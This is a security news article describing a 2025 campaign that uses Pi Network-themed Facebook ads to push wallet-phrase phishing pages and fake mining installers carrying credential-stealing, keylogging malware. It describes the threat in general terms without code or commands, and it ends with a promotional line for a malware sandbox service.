Threat Actors Weaponizing Facebook Ads to Deliver Malware and Stealing Wallet Passwords

Cybercriminals have launched a sophisticated campaign exploiting Facebook’s advertising platform to distribute malware and steal cryptocurrency wallet credentials, targeting users worldwide through deceptive Pi Network-themed advertisements.

The malicious operation, which began on June 24, 2025, coincides with the Pi2Day celebration and has already deployed over 140 ad variations to maximize its reach across multiple continents.

The attack campaign demonstrates a coordinated effort by threat actors who have weaponized legitimate social media advertising mechanisms to deliver multi-stage malware payloads.

These malicious advertisements masquerade as official Pi Network promotions, offering fake mining applications and fraudulent wallet access portals that promise users substantial cryptocurrency rewards.

The campaign’s global scope encompasses the United States, Europe, Australia, China, Vietnam, India, and the Philippines, indicating a well-resourced operation with international ambitions.

The threat actors employ two primary attack vectors to compromise victims. The first involves phishing pages that meticulously mimic legitimate Pi Wallet interfaces, prompting users to enter their 24-word recovery phrases under the pretense of claiming 628 Pi tokens or participating in exclusive airdrop events.

Once entered, these credentials grant attackers complete control over victims’ cryptocurrency wallets, enabling immediate fund transfers.

Bitdefender researchers identified the second attack vector as malware-embedded applications disguised as Pi Network mining software.

These deceptive installers promise users bonuses of 31.4 Pi tokens for downloading and executing PC applications.

However, the software packages contain malicious payloads identified as Generic.MSIL.WMITask and Generic.JS.WMITask variants, representing multi-stage malware previously analyzed by Bitdefender’s security team in May 2025.

Multi-Stage Malware Infection Mechanism

The malware’s infection process demonstrates sophisticated engineering designed to evade detection while maintaining persistence on compromised systems.

Upon initial execution, the malicious payload establishes a foothold through obfuscation techniques that bypass traditional antivirus solutions and sandbox environments.

The malware’s architecture incorporates multiple stages, with each component serving specific functions in the overall attack chain.

The primary payload focuses on credential harvesting, systematically extracting saved passwords, authentication tokens, and cryptocurrency wallet keys from infected systems.

Simultaneously, the malware deploys keylogging capabilities to capture real-time user input, including newly entered passwords, recovery phrases, and sensitive financial information.

The malware’s persistence mechanisms ensure continued operation even after system reboots, while its communication modules establish connections with command-and-control infrastructure to exfiltrate stolen data and download additional malicious components.

The campaign’s success stems from exploiting users’ trust in verified social media platforms and their limited understanding of cryptocurrency security practices.

By leveraging Facebook’s advertising legitimacy and Pi Network’s growing popularity, threat actors have created an effective distribution mechanism that continues to evolve and adapt to security countermeasures.

Investigate live malware behavior, trace every step of an attack, and make faster, smarter security decisions -> Try ANY.RUN now